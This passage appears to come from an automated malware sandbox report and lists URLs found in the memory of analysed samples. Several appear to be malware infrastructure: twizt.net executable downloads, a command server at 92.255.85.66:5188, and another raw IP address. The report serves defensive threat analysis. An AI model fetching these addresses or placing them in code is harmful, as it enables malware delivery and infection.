                          Source: sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                          Source: 1657630034.exeString found in binary or memory: http://91.202.233.141/IBSTSWSONL
                          Source: svchost.exe, 00000011.00000003.2076118628.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A4382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                          Source: svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                          Source: svchost.exe, 00000011.00000003.2076118628.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019401468.000001A6A432C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A4382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                          Source: svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
                          Source: svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xs
                          Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988183184.000001A6A437C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1780350418.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
                          Source: svchost.exe, 00000011.00000003.2049303254.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2018868593.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019333713.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987942495.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860337514.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860508758.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2049566480.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988209134.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894564769.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860862317.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927130291.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894755177.000001A6A4310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078380857.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988235899.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                          Source: svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                          Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                          Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988183184.000001A6A437C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: svchost.exe, 00000011.00000003.2049303254.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2018868593.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019333713.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987942495.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860337514.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860508758.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2049566480.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988209134.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894564769.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860862317.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927130291.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894755177.000001A6A4310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078380857.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988235899.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                          Source: svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                          Source: svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                          Source: svchost.exe, 00000011.00000003.1780350418.000001A6A4352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
                          Source: svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
                          Source: f5TWdT5EAc.exe, 00000000.00000000.1309216886.0000000000408000.00000002.00000001.01000000.00000003.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1366762887.0000000000408000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                          Source: sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859818262.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859642379.000001A6A430E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                          Source: svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019401468.000001A6A432C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
                          Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
                          Source: svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels01
                          Source: svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1
                          Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk1.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk1.exeMozilla/5.0
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk10.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk11.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk12.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk13.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk14.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk15.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk16.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk17.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk18.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk19.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk2.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk2.exehttp://twizt.net/lk3.exehttp://twizt.net/lk4.exehttp://twizt.net/lk5.exehttp
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk20.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk3.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk4.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk5.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk6.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk7.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk8.exe
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/lk9.exe
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe7
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exeO
                          Source: f5TWdT5EAc.exe, 00000000.00000003.1366451263.0000000004CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exeP0
                          Source: 34D7.exe, 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmp, 34D7.exe, 00000003.00000000.1336483986.0000000000252000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://twizt.net/newtpp.exeP0%
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exes
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.php
                          Source: f5TWdT5EAc.exe, 00000000.00000003.1366451263.0000000004CF1000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmp, 34D7.exe, 00000003.00000000.1336483986.0000000000252000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://twizt.net/peinstall.php%temp%%s
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpG
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpJ
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpO
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpZ
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phph
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpmp
                          Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpppData
                          Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://twizt.net/rh.exe
                          Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/rh.exe$
                          Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/rh.exe&m
                          Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/rh.exeBn9
                          Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/rh.exeLj_
                          Source: 1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://twizt.net/rh.exeP0U
                          Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/rh.exeZn
                          Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp, 2910625892.exeString found in binary or memory: http://www.geoplugin.net/json.gp?ip=
                          Source: svchost.exe, 0000000A.00000002.1704092821.000000000270C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1704642025.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, fontdrvhost.exe, 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fkernelbasentdllkernel32GetProcessMitiga
                          Source: svchost.exe, 0000000A.00000002.1704092821.000000000270C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fx
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806014
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                          Source: svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                          Source: svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749005384.000001A6A4357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                          Source: svchost.exe, 0000000A.00000003.1629040986.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                          Source: svchost.exe, 0000000A.00000003.1629040986.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
